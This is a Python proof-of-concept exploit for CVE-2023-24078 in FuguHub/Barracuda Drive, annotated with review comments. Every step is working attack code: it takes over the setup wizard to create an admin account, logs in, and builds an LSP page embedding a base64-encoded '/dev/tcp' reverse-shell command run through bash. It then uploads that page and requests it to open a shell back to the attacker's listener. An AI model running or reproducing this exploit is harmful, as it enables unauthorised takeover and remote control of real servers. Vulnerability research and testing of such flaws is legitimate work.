import requests
import argparse
import base64
import sys
# Surpress SSL Warnings
import urllib3
# Every request in this script is sent with verify=False, so urllib3 would emit an
# InsecureRequestWarning per call; silence it here. Note the consequence: the
# server certificate is never validated, so the script's own traffic is open to
# interception on the path to the target.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Custom usage message
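# Custom usage message, shown in place of argparse's generated one.
usage_message = '''\
usage: python3 CVE-2023-24078.py [-h] -lh LHOST -lp LPORT -th RHOST -tp RPORT
A PoC script for exploiting CVE-2023-24078.
Required arguments:
-lh LHOST, --lhost LHOST Listening Host
-lp LPORT, --lport LPORT Listening Port
-th RHOST, --rhost RHOST Target Host IP
-tp RPORT, --rport RPORT Port of the target
'''
parser = argparse.ArgumentParser(
    description="Exploit PoC for CVE-2023-24078 - FuguHub/Barracuda Drive",
    usage=usage_message,
    formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# Listening host and port
parser.add_argument("-lh", "--lhost", required=True, action="store", help="Listening Host")
parser.add_argument("-lp", "--lport", required=True, action="store", type=int, help="Listening Port")
# Target host and port
parser.add_argument("-th", "--rhost", required=True, action="store", help="Target Host IP")
# type=int for consistency with --lport: a non-numeric port is rejected by argparse
# instead of producing a malformed URL later.
parser.add_argument("-tp", "--rport", required=True, action="store", type=int, help="Port of the target")

# Default options for user creation.
username = 'admin'
password = 'admin'
# NOTE(review): this literal looks like an e-mail obfuscation artefact from the
# page it was copied from, not the author's value — confirm the intended address.
email = '[email protected]'

# With no arguments at all, show the full help text instead of a terse "required
# arguments" error. This has to be folded into the single parse_args() call: the
# original parsed sys.argv first (which already exits on an empty argv because
# every option is required), so its separate '--help' fallback was unreachable.
args = parser.parse_args(args=None if sys.argv[1:] else ['--help'])
LPORT = args.lport
LHOST = args.lhost
URL = args.rhost
RPORT = args.rport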
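def register_admin_account(base_url, username, password, email):
    """POST the admin-creation form of the setup wizard and report the outcome.

    Args:
        base_url: Scheme, host and port of the target, e.g. ``https://host:port``.
        username: Admin username to submit (form field ``user``).
        password: Admin password, submitted as both ``password`` and ``password2``.
        email: E-mail address to submit (form field ``email``).

    Returns:
        True when the response body contains ``"Account Created"``; False on any
        other response or on a requests-level failure. The original returned
        nothing, so callers that ignore the result are unaffected.

    Notes:
        The request is sent with ``verify=False`` (no certificate validation).
        The success marker is the author's assumption; a build of the target
        that words the confirmation differently is reported as a failure.
    """
    registration_url = f"{base_url}/Config-Wizard/wizard/SetAdmin.lsp"
    session = requests.Session()
    data = {
        'email': email,
        'user': username,           # form field is 'user', not 'admin_username'
        'password': password,
        'password2': password,      # confirmation field is 'password2'
        'recoverpassword': 'on',    # checkbox the author saw ticked by default on the form
    }
    try:
        response = session.post(registration_url, data=data, verify=False)
    except requests.exceptions.SSLError as e:
        print(f"SSL Error encountered: {e}")
        return False
    except requests.exceptions.RequestException as e:
        # Connection refused, DNS failure, timeout: previously an uncaught traceback.
        print(f"Request failed: {e}")
        return False
    if "Account Created" in response.text:
        print(f"Successfully set admin account with username: {username} and password: {password}")
        return True
    print(f"Failed to set admin account. Status Code: {response.status_code}")
    return False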
# Target base URL. The scheme is fixed to HTTPS; certificate checks are disabled
# per request (verify=False), so this does not provide server authentication.
base_url = "https://{}:{}".format(URL, RPORT)
register_admin_account(base_url, username=username, password=password, email=email)
def login(base_url, username, password):
    """Authenticate to the protected WFS page and return the session on success.

    A GET on the login URL is issued first so that any cookies the server sets
    are held by the session; the credentials are then POSTed as ``ba_username``
    and ``ba_password``. Both requests use ``verify=False``.

    Returns:
        The ``requests.Session`` when the POST answers HTTP 200, else ``None``.
        NOTE(review): a 200 status alone does not prove authentication — a server
        that re-renders the login form on bad credentials would also answer 200,
        so callers should treat the returned session as unverified.
    """
    login_url = "{}/rtl/protected/wfslinks.lsp".format(base_url)
    http = requests.Session()
    http.get(login_url, verify=False)
    credentials = {
        'ba_username': username,
        'ba_password': password,
    }
    reply = http.post(login_url, data=credentials, verify=False)
    if reply.status_code != 200:
        print(f"Failed to log in as {username}. Status Code: {reply.status_code}")
        return None
    print(f"Successfully logged in as {username}")
    return http
# May be None when login() did not get HTTP 200; the later steps use it as-is.
session = login(base_url, username=username, password=password)
def generate_and_create_payload_file(lhost, lport):
    """Write ``rev.lsp`` in the current directory and return the base64 command.

    The file is an LSP page whose server-side block base64-decodes an embedded
    command and hands it to ``bash`` when the page is requested with GET. From a
    detection standpoint the artefact is an uploaded ``.lsp`` containing
    ``os.execute`` with a ``base64 -d | bash`` pipeline.

    Args:
        lhost: Host the decoded command connects back to.
        lport: Port the decoded command connects back to.

    Returns:
        The base64-encoded command string that was embedded in the file.
    """
    shell_command = "sh -i >& /dev/tcp/{}/{} 0>&1".format(lhost, lport)
    encoded = base64.b64encode(shell_command.encode()).decode()
    # Template is a plain string; the single placeholder is filled with .format().
    template = '''<div style="margin-left:auto;margin-right: auto;width: 350px;">
<div id="info">
<h2>Lua Reverse Shell</h2>
<p>CVE-2023-24078</p>
</div>
<?lsp if request:method() == "GET" then ?>
<?lsp os.execute("echo {encoded_payload} | base64 -d | bash") ?>
<?lsp else ?>
You sent a <?lsp=request:method()?> request
<?lsp end ?>
</div>'''
    page = template.format(encoded_payload=encoded)
    # Written relative to the current working directory, as in the original.
    with open("rev.lsp", "w") as out:
        out.write(page)
    return encoded
# Usage
# Side effect is the local file rev.lsp; the returned string is not used further.
payload = generate_and_create_payload_file(lhost=LHOST, lport=LPORT)
import requests
def upload_payload(session, base_url, payload_file_path):
    """Upload a local file to ``<base_url>/fs/`` as multipart form data.

    Args:
        session: ``requests.Session`` returned by ``login``.
        base_url: Scheme, host and port of the target.
        payload_file_path: Local path of the file to send.

    The remote file name is always ``rev.lsp`` regardless of
    ``payload_file_path``. Prints whether the server answered HTTP 200; a
    200 is the only success signal checked. Sent with ``verify=False``.
    """
    target = f"{base_url}/fs/"
    with open(payload_file_path, 'rb') as fh:
        multipart = {'file': ('rev.lsp', fh, 'application/octet-stream')}
        reply = session.post(target, files=multipart, verify=False)
    if reply.status_code != 200:
        print(f"Failed to upload payload. Status Code: {reply.status_code}")
        return
    print("Payload uploaded successfully")
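# login() returns None when its POST was not HTTP 200; without this guard the
# upload failed with an AttributeError on None instead of a clear message.
if session is None:
    sys.exit("No authenticated session; skipping upload")
upload_payload(session, base_url, "rev.lsp")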
def execute_payload(session, base_url, payload_file):
    """GET ``<base_url>/<payload_file>`` with the session and report the status.

    Only the HTTP status is observed: a 200 means the page was served, not that
    anything connected back to the listener. Sent with ``verify=False``.
    """
    reply = session.get("{}/{}".format(base_url, payload_file), verify=False)
    if reply.status_code != 200:
        print(f"Failed to execute payload. Status Code: {reply.status_code}")
        return
    # Plain string: the original f-prefix had no placeholders.
    print("Payload executed. Check your listener for a shell")
# Must match the remote name fixed inside upload_payload() ('rev.lsp').
payload_file = "rev.lsp"
execute_payload(session, base_url, payload_file=payload_file)